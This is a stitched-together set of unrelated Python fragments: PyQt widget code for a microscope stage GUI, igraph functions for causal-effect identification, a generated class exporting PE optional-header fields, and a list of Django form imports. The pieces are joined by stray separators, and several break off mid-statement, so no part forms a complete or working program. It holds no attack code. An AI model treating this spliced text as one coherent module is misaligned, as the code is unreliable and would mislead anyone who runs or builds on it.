# Optomechanical
_servos = QtWidgets.QGroupBox("Optomechanical")
_servos_layout = QtWidgets.QGridLayout()
self._shutterAbsoluteMode = QtWidgets.QCheckBox("Use Absolute Mode for Shutter")
self._powerAbsoluteMode = QtWidgets.QCheckBox("Use Absolute Mode for Power")
_shutterChannel_label_main = QtWidgets.QLabel("Shutter Channel")
_shutterChannel_label_left = QtWidgets.QLabel("Left")
_shutterChannel_label_righ = QtWidgets.QLabel("Right")
_shutterChannel_label_main.setAlignment(QtCore.Qt.AlignTop)
_shutterChannel_label_left.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)
_shutterChannel_label_righ.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignTop)
self._shutterChannel = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self._shutterChannel.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self._shutterChannel.setRange(0, 1)
self._shutterChannel.setSingleStep(1)
self._shutterChannel.setPageStep(1)
self._shutterChannel.setTickInterval(1)
# WE USE THIS WORKAROUND OF SETTING 0 TO 1 BECAUSE MOUSEEVENTS ARE NOT AFFECTED BY ABOVE SETTINGS
# addWidget(QWidget * widget, int fromRow, int fromColumn, int rowSpan, int columnSpan, Qt::Alignment alignment = 0)
_servos_layout.addWidget(self._shutterAbsoluteMode, 0, 0, 1, 3)
_servos_layout.addWidget(self._powerAbsoluteMode, 1, 0, 1, 3)
_servos_layout.addWidget(_shutterChannel_label_main, 2, 0, 2, 1)
_servos_layout.addWidget(self._shutterChannel, 2, 1, 1, 2)
_servos_layout.addWidget(_shutterChannel_label_left, 3, 1, 1, 1)
_servos_layout.addWidget(_shutterChannel_label_righ, 3, 2, 1, 1)
_servos_layout.setColumnStretch(0, 2)
_servos_layout.setColumnStretch(1, 1)
_servos_layout.setColumnStretch(2, 1)
_servos.setLayout(_servos_layout)
# / Optomechanical
# Stage Configuration
# These are the initialization settings and does not affect the current session!
_stage = QtWidgets.QGroupBox("Stage Settings")
_stage_layout = QtWidgets.QGridLayout()
_stage_xlim_label = QtWidgets.QLabel("X-Limits")
self._stage_xlim_lower = QtWidgets.QLineEdit()
self._stage_xlim_lower.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._stage_xlim_upper = QtWidgets.QLineEdit()
self._stage_xlim_upper.setValidator(QtGui.QDoubleValidator()) # Accept any Double
_stage_ylim_label = QtWidgets.QLabel("Y-Limits")
self._stage_ylim_lower = QtWidgets.QLineEdit()
self._stage_ylim_lower.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._stage_ylim_upper = QtWidgets.QLineEdit()
self._stage_ylim_upper.setValidator(QtGui.QDoubleValidator()) # Accept any Double
self._noHome = QtWidgets.QCheckBox("Do not home stage on start")
_note = QtWidgets.QLabel("Limits and Homing Settings take effect only after app restart!\nStage will be initialised in the center of the limits")
_note.setStyleSheet("color: red;")
self._invertx = QtWidgets.QCheckBox("Invert Horizontal")
self._inverty = | |
from __future__ import annotations
import igraph
import copy
import numpy
from typing import List
from dataclasses import dataclass, field
def observed_graph(g):
"""
Constructs a subgraph containing only observed edges
:param g: Input graph
:return: Subgraph containing only observed edges
"""
g_obs = copy.deepcopy(g)
unobs_edges = g_obs.es.select(description="U")
g_obs.delete_edges(unobs_edges)
return g_obs
def unobserved_graph(g):
"""
Constructs an unobserved graph
:param g: Input graph
:return: unobserved graph
"""
g_copy = copy.deepcopy(g)
unobs_edges = g_copy.es.select(description="U")
u1 = len(unobs_edges)
if u1 > 0:
u = g_copy.es.select(description="U")
edges_to_remove = []
for edge in u:
edge_tuple = edge.tuple
if edge_tuple[1] > edge_tuple[0]:
edges_to_remove.append(edge.index)
g_copy.delete_edges(edges_to_remove)
e = g_copy.es.select(description="U")
e_len = len(e)
new_nodes = []
for i in range(e_len):
new_nodes.append(f"u_{{i + 1}}")
g_copy.add_vertices(new_nodes, attributes={"description": ["U"] * e_len})
edge_list = []
# We have now inserted new unobserved nodes into the graph
# We replace the unobserved bi-directed edges with new edges pointing away from the new unobserved nodes
# a is the index of the new unobserved node
# b and c are the two nodes that were previously connected by a bi-directed edge
for i in range(e_len): # Loop through unobserved edges
a = g_copy.vs.select(name=new_nodes[i]).indices[0]
b = e[i].tuple[0]
edge_list.append((a, b))
c = e[i].tuple[1]
edge_list.append((a, c))
g_copy.add_edges(edge_list, attributes={"description": ["O"] * len(edge_list)})
obs_edges = g_copy.es.select(description_ne="U")
g_unobs = g_copy.subgraph_edges(obs_edges, delete_vertices=False)
return g_unobs
return g
def ts(nodes, topo_order): # topo must be a list of names
"""
Orders nodes by their topological order
:param nodes: Nodes to be ordered
:param topo_order: Order to arrange nodes
:return: Ordered nodes (indices)
"""
node_set = set(nodes)
return [n for n in topo_order if n in node_set]
def to_names(indices, g):
"""
converts vertex indices indices to vertex names
:param indices: list of indices
:param g: graph (with named nodes)
:return: list of vertex names
"""
name_list = g.vs["name"]
name_sorted = [name_list[i] for i in indices]
return name_sorted
def find_related_nodes_of(nodes, g, mode, order=1, topo=None, exclude_orig=False):
"""
Finds all related nodes of a set by "mode" and optionally sorts them in topological order
:param nodes: a list of nodes
:param g: iGraph graph
:param mode: "in" to return ancestors of nodes,
"out" to return descendants of nodes,
"all" to return all connected nodes
:param order: for int, the maximum number of steps to take from nodes
for "max", will find all
:param topo: topological order in which the return should be sorted
:param exclude_orig: if True, the nodes in "nodes" will be removed from the return
:return: the (optionally ordered) related nodes
"""
# Check that mode is specified correctly
if mode not in ["in", "out", "all"]:
raise ValueError('Invalid mode specified, select from: "in", "out", or "all"')
# Check that order is specified correctly, and compute g.vcount() if necessary
if type(order) == int:
order_to_pass = order
elif order == "max":
order_to_pass = g.vcount()
else:
raise ValueError('Invalid order specified, specify an integer or "max"')
# Find the correct nodes
related_list = g.neighborhood(nodes, order=order_to_pass, mode=mode)
related_ind = list(set([node for related_nodes in related_list for node in related_nodes]))
related_names = to_names(related_ind, g)
# Remove the original nodes, if desired
if exclude_orig:
for node in nodes:
related_names.remove(node)
# Sort nodes into specified topological order, if desired
if topo is not None:
related_names_sorted = ts(related_names, topo)
return related_names_sorted
return related_names
#
#
# # Assume "O" and "U" are specified in "description" attribute
# def compare_graphs(g1, g2):
# """
# Determines if two graphs are the same (including edge descriptions)
# :param g1: First graph
# :param g2: Second graph
# :return: T/F indicating if G1 is the same as G2
# """
# e1 = numpy.array(g1.get_edgelist())
# n1 = numpy.shape(e1)[0]
# e2 = numpy.array(g2.get_edgelist())
# n2 = numpy.shape(e2)[0]
# if n1 != n2:
# return False
# if "description" in g1.es.attributes():
# e1 = numpy.append(e1, numpy.transpose([g1.es["description"]]), axis=1)
# else:
# e1 = numpy.append(e1, numpy.transpose([numpy.repeat("O", n1)]), axis=1)
# if "description" in g2.es.attributes():
# e2 = numpy.append(e2, numpy.transpose([g2.es["description"]]), axis=1)
# else:
# e2 = numpy.append(e2, numpy.transpose([numpy.repeat("O", n2)]), axis=1)
# return numpy.array_equal(e1, e2)
# Edge Selection Function (for line 3 section of ID)
def eselect(x, g):
"""
Determines which edges should remain when cutting incoming arrows to x
:param x: list of vertices
:param g: graph
:return: list of edges to keep
"""
edges = set(g.es.select().indices)
to = set(g.es.select(_to_in=g.vs.select(name_in=x).indices).indices)
frm = set(g.es.select(_from_in=g.vs.select(name_in=x).indices).indices)
description = set(g.es.select(description="U").indices)
selection = edges - (to | (frm & description))
return list(selection)
def eselect2(g, x, z):
"""
For use in compute_IDC. Selects all edges in g except incoming to x and outgoing from z.
:param g: graph
:param x: nodes
:param z: nodes
:return: The set of edges in g that are not incoming to x or outgoing from z.
"""
edges = set(g.es.select().indices)
to_x = set(g.es.select(_to_in=g.vs.select(name_in=x).indices).indices)
from_z = set(g.es.select(_from_in=g.vs.select(name_in=z).indices).indices)
selection = edges - to_x - from_z
return selection
def get_expression(prob, start_sum=False, single_source=False, target_sym="^*("):
"""
Converts a class probability object to LaTeX plaintext
:param prob: an object of class probability
:param start_sum: should a sum be started
:param single_source: is there only one source?
:param target_sym: ? todo: fix this
:return: LaTeX plaintext
"""
p = ""
s_print = len(prob.sumset) > 0
if s_print:
sum_string = ",".join(prob.sumset)
if start_sum:
p = f"{p}\\left(\\sum_{{{sum_string}}}"
else:
p = f"{p}\\sum_{{{sum_string}}}"
if prob.fraction:
f_num = get_expression(prob.num, start_sum=False, single_source=single_source, target_sym=target_sym)
f_den = get_expression(prob.den, start_sum=False, single_source=single_source, target_sym=target_sym)
p = f"{p}\\frac{{{f_num}}}{{{f_den}}}"
# if prob.sum:
# p = f"{p}\\left("
# add_strings = []
# i = 1
# for child in prob.children:
# new_sum = False
# if child.product or child.sum:
# new_sum = True
# child_ge = get_expression(child, start_sum=new_sum, single_source=single_source, target_sym=target_sym)
# to_append = f"w_{{{i}}}^{{({child.weight})}}{child_ge}"
# add_strings.append(to_append)
# i = i + 1
# con_strings = "".join(add_strings)
# p = f"{p}{con_strings}\\right)"
if prob.product:
for child in prob.children:
new_sum = False
if child.product or child.sum:
new_sum = True
child_ge = get_expression(child, start_sum=new_sum, single_source=single_source, target_sym=target_sym)
p = f"{p}{child_ge}"
if not (prob.sum or prob.product or prob.fraction):
p = f"{p}P"
if len(prob.do) > 0:
do_string = "".join([prob.do])
p = f"{p}_{{{do_string}}}"
var_string = ",".join(prob.var)
if prob.domain > 0:
if prob.dom == 1:
p = f"{p}{target_sym}{var_string}"
else:
if single_source:
p = f"{p}({var_string}"
else:
p = f"{p}^{{({str(prob.domain - 1)}}}({var_string}"
else:
p = f"{p}({var_string}"
if len(prob.cond) > 0:
cond_string = ",".join(prob.cond) # prob.cond must have elements that are strings
cond_string = f"\u007C{cond_string})"
else:
cond_string = ")"
p = f"{p}{cond_string}"
if s_print and start_sum:
p = ",".join([p, "\\right)"])
return p
def c_components(g, topo):
"""
Finds c-components in graph g
:param g: graph
:param topo: topological ordering
:return: list of c-components (each c-component is a list of nodes)
"""
a = g.get_adjacency()
n = a.shape[0]
v = g.vs["name"]
bidirected = []
for i in range(0, n):
for j in range(i+1, n):
if a[i][j] >= 1 and a[j][i] >= 1:
bidirected.append(i)
bidirected.append(j)
bidirected_edges = g.es.select(_within=bidirected)
g_bidirected = g.subgraph_edges(bidirected_edges, delete_vertices=False)
subgraphs = g_bidirected.decompose()
cc = []
cc_rank = []
for subgraph in subgraphs:
nodes = ts(subgraph.vs["name"], topo)
cc.append(nodes)
rank = 0
for node in nodes:
rank = rank + topo.index(node)
cc_rank.append(rank)
(cc_sorted, _) = list(map(list, zip(*sorted(zip(cc, cc_rank), key=lambda ab: ab[1], reverse=True))))
return cc_sorted
def parse_joint(p, v, cond, var, topo):
p_new = Probability()
p_num = copy.deepcopy(p)
p_num.sumset = ts(set(p.sumset) | (set(var) - set(v) - set(cond)), topo)
if len(cond) > 0:
p_den = copy.deepcopy(p)
p_den.sumset = ts(set(p.sumset) | (set(var) - set(cond)), topo)
p_new.fraction = True
p_new.num = copy.deepcopy(p_num)
p_new.den = copy.deepcopy(p_den)
else:
p_new = copy.deepcopy(p_num)
return p_new
def wrap_d_sep(g, x, y, z):
"""
Does some quick checks before testing d-separation
:param g: Graph
:param x: nodes
:param y: nodes
:param z: nodes
:return: T/F if x is separated from y given z in g
"""
if x == y:
return False
if len(x) == 0 or len(y) == 0:
return True
return d_sep(g, x, y, z)
def d_sep(g, x, y, z):
"""
From R package causaleffect:
"Implements relevant path separation (rp-separation) for testing d-separation. For details, see:
Relevant Path Separation: A Faster Method for Testing Independencies in Bayesian Networks
<NAME>, <NAME>, <NAME>;
Proceedings of the Eighth International Conference on Probabilistic Graphical Models,
PMLR 52:74-85, 2016."
:param g: graph
:param x: nodes
:param y: nodes
:param z: nodes
:return: T/F if x is separated from y given z in | |
included."""
subclass = None
superclass = None
def __init__(self, Magic=None, Major_Linker_Version=None, Minor_Linker_Version=None, Size_Of_Code=None, Size_Of_Initialized_Data=None, Size_Of_Uninitialized_Data=None, Address_Of_Entry_Point=None, Base_Of_Code=None, Base_Of_Data=None, Image_Base=None, Section_Alignment=None, File_Alignment=None, Major_OS_Version=None, Minor_OS_Version=None, Major_Image_Version=None, Minor_Image_Version=None, Major_Subsystem_Version=None, Minor_Subsystem_Version=None, Win32_Version_Value=None, Size_Of_Image=None, Size_Of_Headers=None, Checksum=None, Subsystem=None, DLL_Characteristics=None, Size_Of_Stack_Reserve=None, Size_Of_Stack_Commit=None, Size_Of_Heap_Reserve=None, Size_Of_Heap_Commit=None, Loader_Flags=None, Number_Of_Rva_And_Sizes=None, Data_Directory=None, Hashes=None):
self.Magic = Magic
self.Major_Linker_Version = Major_Linker_Version
self.Minor_Linker_Version = Minor_Linker_Version
self.Size_Of_Code = Size_Of_Code
self.Size_Of_Initialized_Data = Size_Of_Initialized_Data
self.Size_Of_Uninitialized_Data = Size_Of_Uninitialized_Data
self.Address_Of_Entry_Point = Address_Of_Entry_Point
self.Base_Of_Code = Base_Of_Code
self.Base_Of_Data = Base_Of_Data
self.Image_Base = Image_Base
self.Section_Alignment = Section_Alignment
self.File_Alignment = File_Alignment
self.Major_OS_Version = Major_OS_Version
self.Minor_OS_Version = Minor_OS_Version
self.Major_Image_Version = Major_Image_Version
self.Minor_Image_Version = Minor_Image_Version
self.Major_Subsystem_Version = Major_Subsystem_Version
self.Minor_Subsystem_Version = Minor_Subsystem_Version
self.Win32_Version_Value = Win32_Version_Value
self.Size_Of_Image = Size_Of_Image
self.Size_Of_Headers = Size_Of_Headers
self.Checksum = Checksum
self.Subsystem = Subsystem
self.DLL_Characteristics = DLL_Characteristics
self.Size_Of_Stack_Reserve = Size_Of_Stack_Reserve
self.Size_Of_Stack_Commit = Size_Of_Stack_Commit
self.Size_Of_Heap_Reserve = Size_Of_Heap_Reserve
self.Size_Of_Heap_Commit = Size_Of_Heap_Commit
self.Loader_Flags = Loader_Flags
self.Number_Of_Rva_And_Sizes = Number_Of_Rva_And_Sizes
self.Data_Directory = Data_Directory
self.Hashes = Hashes
def factory(*args_, **kwargs_):
if PEOptionalHeaderType.subclass:
return PEOptionalHeaderType.subclass(*args_, **kwargs_)
else:
return PEOptionalHeaderType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Magic(self): return self.Magic
def set_Magic(self, Magic): self.Magic = Magic
def get_Major_Linker_Version(self): return self.Major_Linker_Version
def set_Major_Linker_Version(self, Major_Linker_Version): self.Major_Linker_Version = Major_Linker_Version
def get_Minor_Linker_Version(self): return self.Minor_Linker_Version
def set_Minor_Linker_Version(self, Minor_Linker_Version): self.Minor_Linker_Version = Minor_Linker_Version
def get_Size_Of_Code(self): return self.Size_Of_Code
def set_Size_Of_Code(self, Size_Of_Code): self.Size_Of_Code = Size_Of_Code
def get_Size_Of_Initialized_Data(self): return self.Size_Of_Initialized_Data
def set_Size_Of_Initialized_Data(self, Size_Of_Initialized_Data): self.Size_Of_Initialized_Data = Size_Of_Initialized_Data
def get_Size_Of_Uninitialized_Data(self): return self.Size_Of_Uninitialized_Data
def set_Size_Of_Uninitialized_Data(self, Size_Of_Uninitialized_Data): self.Size_Of_Uninitialized_Data = Size_Of_Uninitialized_Data
def get_Address_Of_Entry_Point(self): return self.Address_Of_Entry_Point
def set_Address_Of_Entry_Point(self, Address_Of_Entry_Point): self.Address_Of_Entry_Point = Address_Of_Entry_Point
def get_Base_Of_Code(self): return self.Base_Of_Code
def set_Base_Of_Code(self, Base_Of_Code): self.Base_Of_Code = Base_Of_Code
def get_Base_Of_Data(self): return self.Base_Of_Data
def set_Base_Of_Data(self, Base_Of_Data): self.Base_Of_Data = Base_Of_Data
def get_Image_Base(self): return self.Image_Base
def set_Image_Base(self, Image_Base): self.Image_Base = Image_Base
def get_Section_Alignment(self): return self.Section_Alignment
def set_Section_Alignment(self, Section_Alignment): self.Section_Alignment = Section_Alignment
def get_File_Alignment(self): return self.File_Alignment
def set_File_Alignment(self, File_Alignment): self.File_Alignment = File_Alignment
def get_Major_OS_Version(self): return self.Major_OS_Version
def set_Major_OS_Version(self, Major_OS_Version): self.Major_OS_Version = Major_OS_Version
def get_Minor_OS_Version(self): return self.Minor_OS_Version
def set_Minor_OS_Version(self, Minor_OS_Version): self.Minor_OS_Version = Minor_OS_Version
def get_Major_Image_Version(self): return self.Major_Image_Version
def set_Major_Image_Version(self, Major_Image_Version): self.Major_Image_Version = Major_Image_Version
def get_Minor_Image_Version(self): return self.Minor_Image_Version
def set_Minor_Image_Version(self, Minor_Image_Version): self.Minor_Image_Version = Minor_Image_Version
def get_Major_Subsystem_Version(self): return self.Major_Subsystem_Version
def set_Major_Subsystem_Version(self, Major_Subsystem_Version): self.Major_Subsystem_Version = Major_Subsystem_Version
def get_Minor_Subsystem_Version(self): return self.Minor_Subsystem_Version
def set_Minor_Subsystem_Version(self, Minor_Subsystem_Version): self.Minor_Subsystem_Version = Minor_Subsystem_Version
def get_Win32_Version_Value(self): return self.Win32_Version_Value
def set_Win32_Version_Value(self, Win32_Version_Value): self.Win32_Version_Value = Win32_Version_Value
def get_Size_Of_Image(self): return self.Size_Of_Image
def set_Size_Of_Image(self, Size_Of_Image): self.Size_Of_Image = Size_Of_Image
def get_Size_Of_Headers(self): return self.Size_Of_Headers
def set_Size_Of_Headers(self, Size_Of_Headers): self.Size_Of_Headers = Size_Of_Headers
def get_Checksum(self): return self.Checksum
def set_Checksum(self, Checksum): self.Checksum = Checksum
def get_Subsystem(self): return self.Subsystem
def set_Subsystem(self, Subsystem): self.Subsystem = Subsystem
def get_DLL_Characteristics(self): return self.DLL_Characteristics
def set_DLL_Characteristics(self, DLL_Characteristics): self.DLL_Characteristics = DLL_Characteristics
def get_Size_Of_Stack_Reserve(self): return self.Size_Of_Stack_Reserve
def set_Size_Of_Stack_Reserve(self, Size_Of_Stack_Reserve): self.Size_Of_Stack_Reserve = Size_Of_Stack_Reserve
def get_Size_Of_Stack_Commit(self): return self.Size_Of_Stack_Commit
def set_Size_Of_Stack_Commit(self, Size_Of_Stack_Commit): self.Size_Of_Stack_Commit = Size_Of_Stack_Commit
def get_Size_Of_Heap_Reserve(self): return self.Size_Of_Heap_Reserve
def set_Size_Of_Heap_Reserve(self, Size_Of_Heap_Reserve): self.Size_Of_Heap_Reserve = Size_Of_Heap_Reserve
def get_Size_Of_Heap_Commit(self): return self.Size_Of_Heap_Commit
def set_Size_Of_Heap_Commit(self, Size_Of_Heap_Commit): self.Size_Of_Heap_Commit = Size_Of_Heap_Commit
def get_Loader_Flags(self): return self.Loader_Flags
def set_Loader_Flags(self, Loader_Flags): self.Loader_Flags = Loader_Flags
def get_Number_Of_Rva_And_Sizes(self): return self.Number_Of_Rva_And_Sizes
def set_Number_Of_Rva_And_Sizes(self, Number_Of_Rva_And_Sizes): self.Number_Of_Rva_And_Sizes = Number_Of_Rva_And_Sizes
def get_Data_Directory(self): return self.Data_Directory
def set_Data_Directory(self, Data_Directory): self.Data_Directory = Data_Directory
def get_Hashes(self): return self.Hashes
def set_Hashes(self, Hashes): self.Hashes = Hashes
def export(self, outfile, level, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PEOptionalHeaderType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType'):
pass
def exportChildren(self, outfile, level, namespace_='WinExecutableFileObj:', name_='PEOptionalHeaderType', fromsubclass_=False):
if self.Magic is not None:
self.Magic.export(outfile, level, namespace_, name_='Magic')
if self.Major_Linker_Version is not None:
self.Major_Linker_Version.export(outfile, level, namespace_, name_='Major_Linker_Version')
if self.Minor_Linker_Version is not None:
self.Minor_Linker_Version.export(outfile, level, namespace_, name_='Minor_Linker_Version')
if self.Size_Of_Code is not None:
self.Size_Of_Code.export(outfile, level, namespace_, name_='Size_Of_Code')
if self.Size_Of_Initialized_Data is not None:
self.Size_Of_Initialized_Data.export(outfile, level, namespace_, name_='Size_Of_Initialized_Data')
if self.Size_Of_Uninitialized_Data is not None:
self.Size_Of_Uninitialized_Data.export(outfile, level, namespace_, name_='Size_Of_Uninitialized_Data')
if self.Address_Of_Entry_Point is not None:
self.Address_Of_Entry_Point.export(outfile, level, namespace_, name_='Address_Of_Entry_Point')
if self.Base_Of_Code is not None:
self.Base_Of_Code.export(outfile, level, namespace_, name_='Base_Of_Code')
if self.Base_Of_Data is not None:
self.Base_Of_Data.export(outfile, level, namespace_, name_='Base_Of_Data')
if self.Image_Base is not None:
self.Image_Base.export(outfile, level, namespace_, name_='Image_Base')
if self.Section_Alignment is not None:
self.Section_Alignment.export(outfile, level, namespace_, name_='Section_Alignment')
if self.File_Alignment is not None:
self.File_Alignment.export(outfile, level, namespace_, name_='File_Alignment')
if self.Major_OS_Version is not None:
self.Major_OS_Version.export(outfile, level, namespace_, name_='Major_OS_Version')
if self.Minor_OS_Version is not None:
self.Minor_OS_Version.export(outfile, level, namespace_, name_='Minor_OS_Version')
if self.Major_Image_Version is not None:
self.Major_Image_Version.export(outfile, level, namespace_, name_='Major_Image_Version')
if self.Minor_Image_Version is not None:
self.Minor_Image_Version.export(outfile, level, namespace_, name_='Minor_Image_Version')
if self.Major_Subsystem_Version is not None:
self.Major_Subsystem_Version.export(outfile, level, namespace_, name_='Major_Subsystem_Version')
if self.Minor_Subsystem_Version is not None:
self.Minor_Subsystem_Version.export(outfile, level, namespace_, name_='Minor_Subsystem_Version')
if self.Win32_Version_Value is not None:
self.Win32_Version_Value.export(outfile, level, namespace_, name_='Win32_Version_Value')
if self.Size_Of_Image is not None:
self.Size_Of_Image.export(outfile, level, namespace_, name_='Size_Of_Image')
if self.Size_Of_Headers is not None:
self.Size_Of_Headers.export(outfile, level, namespace_, name_='Size_Of_Headers')
if self.Checksum is not None:
self.Checksum.export(outfile, level, namespace_, name_='Checksum')
if self.Subsystem is not None:
self.Subsystem.export(outfile, level, namespace_, name_='Subsystem')
if self.DLL_Characteristics is not None:
self.DLL_Characteristics.export(outfile, level, namespace_, name_='DLL_Characteristics')
if self.Size_Of_Stack_Reserve is not None:
self.Size_Of_Stack_Reserve.export(outfile, level, namespace_, name_='Size_Of_Stack_Reserve')
if self.Size_Of_Stack_Commit is not None:
self.Size_Of_Stack_Commit.export(outfile, level, namespace_, name_='Size_Of_Stack_Commit')
if self.Size_Of_Heap_Reserve is not None:
self.Size_Of_Heap_Reserve.export(outfile, level, namespace_, name_='Size_Of_Heap_Reserve')
if self.Size_Of_Heap_Commit is not None:
self.Size_Of_Heap_Commit.export(outfile, level, namespace_, name_='Size_Of_Heap_Commit')
if self.Loader_Flags is not None:
self.Loader_Flags.export(outfile, level, namespace_, name_='Loader_Flags')
if self.Number_Of_Rva_And_Sizes is not None:
self.Number_Of_Rva_And_Sizes.export(outfile, level, namespace_, name_='Number_Of_Rva_And_Sizes')
if self.Data_Directory is not None:
self.Data_Directory.export(outfile, level, namespace_, name_='Data_Directory')
if self.Hashes is not None:
self.Hashes.export(outfile, level, namespace_, name_='Hashes')
def hasContent_(self):
if (
self.Magic is not None or
self.Major_Linker_Version is not None or
self.Minor_Linker_Version is not None or
self.Size_Of_Code is not None or
self.Size_Of_Initialized_Data is not None or
self.Size_Of_Uninitialized_Data is not None or
self.Address_Of_Entry_Point is not None or
self.Base_Of_Code is not None or
self.Base_Of_Data is not None or
self.Image_Base is not None or
self.Section_Alignment is not None or
self.File_Alignment is not None or
self.Major_OS_Version is not None or
self.Minor_OS_Version is not None or
self.Major_Image_Version is not None or
self.Minor_Image_Version is not None or
self.Major_Subsystem_Version is not None or
self.Minor_Subsystem_Version is not None or
self.Win32_Version_Value is not None or
self.Size_Of_Image is not None or
self.Size_Of_Headers is not None or
self.Checksum is not None or
self.Subsystem is not None or
self.DLL_Characteristics is not None or
self.Size_Of_Stack_Reserve is not None or
self.Size_Of_Stack_Commit is not None or
self.Size_Of_Heap_Reserve is not None or
self.Size_Of_Heap_Commit is not None or
self.Loader_Flags is not None or
self.Number_Of_Rva_And_Sizes is not None or
self.Data_Directory is not None or
self.Hashes is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='PEOptionalHeaderType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Magic is not None:
showIndent(outfile, level)
outfile.write('Magic=%s,\n' % quote_python(self.Magic).encode(ExternalEncoding))
if self.Major_Linker_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Linker_Version=%s,\n' % quote_python(self.Major_Linker_Version).encode(ExternalEncoding))
if self.Minor_Linker_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Linker_Version=%s,\n' % quote_python(self.Minor_Linker_Version).encode(ExternalEncoding))
if self.Size_Of_Code is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Code=%s,\n' % quote_python(self.Size_Of_Code).encode(ExternalEncoding))
if self.Size_Of_Initialized_Data is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Initialized_Data=%s,\n' % quote_python(self.Size_Of_Initialized_Data).encode(ExternalEncoding))
if self.Size_Of_Uninitialized_Data is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Uninitialized_Data=%s,\n' % quote_python(self.Size_Of_Uninitialized_Data).encode(ExternalEncoding))
if self.Address_Of_Entry_Point is not None:
showIndent(outfile, level)
outfile.write('Address_Of_Entry_Point=%s,\n' % quote_python(self.Address_Of_Entry_Point).encode(ExternalEncoding))
if self.Base_Of_Code is not None:
showIndent(outfile, level)
outfile.write('Base_Of_Code=%s,\n' % quote_python(self.Base_Of_Code).encode(ExternalEncoding))
if self.Base_Of_Data is not None:
showIndent(outfile, level)
outfile.write('Base_Of_Data=%s,\n' % quote_python(self.Base_Of_Data).encode(ExternalEncoding))
if self.Image_Base is not None:
showIndent(outfile, level)
outfile.write('Image_Base=%s,\n' % quote_python(self.Image_Base).encode(ExternalEncoding))
if self.Section_Alignment is not None:
showIndent(outfile, level)
outfile.write('Section_Alignment=%s,\n' % quote_python(self.Section_Alignment).encode(ExternalEncoding))
if self.File_Alignment is not None:
showIndent(outfile, level)
outfile.write('File_Alignment=%s,\n' % quote_python(self.File_Alignment).encode(ExternalEncoding))
if self.Major_OS_Version is not None:
showIndent(outfile, level)
outfile.write('Major_OS_Version=%s,\n' % quote_python(self.Major_OS_Version).encode(ExternalEncoding))
if self.Minor_OS_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_OS_Version=%s,\n' % quote_python(self.Minor_OS_Version).encode(ExternalEncoding))
if self.Major_Image_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Image_Version=%s,\n' % quote_python(self.Major_Image_Version).encode(ExternalEncoding))
if self.Minor_Image_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Image_Version=%s,\n' % quote_python(self.Minor_Image_Version).encode(ExternalEncoding))
if self.Major_Subsystem_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Subsystem_Version=%s,\n' % quote_python(self.Major_Subsystem_Version).encode(ExternalEncoding))
if self.Minor_Subsystem_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Subsystem_Version=%s,\n' % quote_python(self.Minor_Subsystem_Version).encode(ExternalEncoding))
if self.Win32_Version_Value is not None:
showIndent(outfile, level)
outfile.write('Win32_Version_Value=%s,\n' % quote_python(self.Win32_Version_Value).encode(ExternalEncoding))
if self.Size_Of_Image is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Image=%s,\n' % quote_python(self.Size_Of_Image).encode(ExternalEncoding))
if self.Size_Of_Headers is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Headers=%s,\n' % quote_python(self.Size_Of_Headers).encode(ExternalEncoding))
if self.Checksum is not None:
showIndent(outfile, level)
outfile.write('Checksum=%s,\n' % quote_python(self.Checksum).encode(ExternalEncoding))
if self.Subsystem is not None:
showIndent(outfile, level)
outfile.write('Subsystem=%s,\n' % quote_python(self.Subsystem).encode(ExternalEncoding))
if self.DLL_Characteristics is not None:
showIndent(outfile, level)
outfile.write('DLL_Characteristics=%s,\n' % quote_python(self.DLL_Characteristics).encode(ExternalEncoding))
if self.Size_Of_Stack_Reserve is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Stack_Reserve=%s,\n' % quote_python(self.Size_Of_Stack_Reserve).encode(ExternalEncoding))
if self.Size_Of_Stack_Commit is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Stack_Commit=%s,\n' % quote_python(self.Size_Of_Stack_Commit).encode(ExternalEncoding))
| |
import json
import re
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.forms.fields import *
from django.forms.forms import Form
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy, ugettext_noop
from couchdbkit.exceptions import ResourceNotFound
from crispy_forms import bootstrap as twbscrispy
from crispy_forms import layout as crispy
from crispy_forms.bootstrap import InlineField, StrictButton
from crispy_forms.layout import Div
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.django.fields import TrimmedCharField
from corehq.apps.app_manager.dbaccessors import get_built_app_ids
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import DayTimeWindow
from corehq.apps.groups.models import Group
from corehq.apps.hqwebapp import crispy as hqcrispy
from corehq.apps.hqwebapp.crispy import HQFormHelper
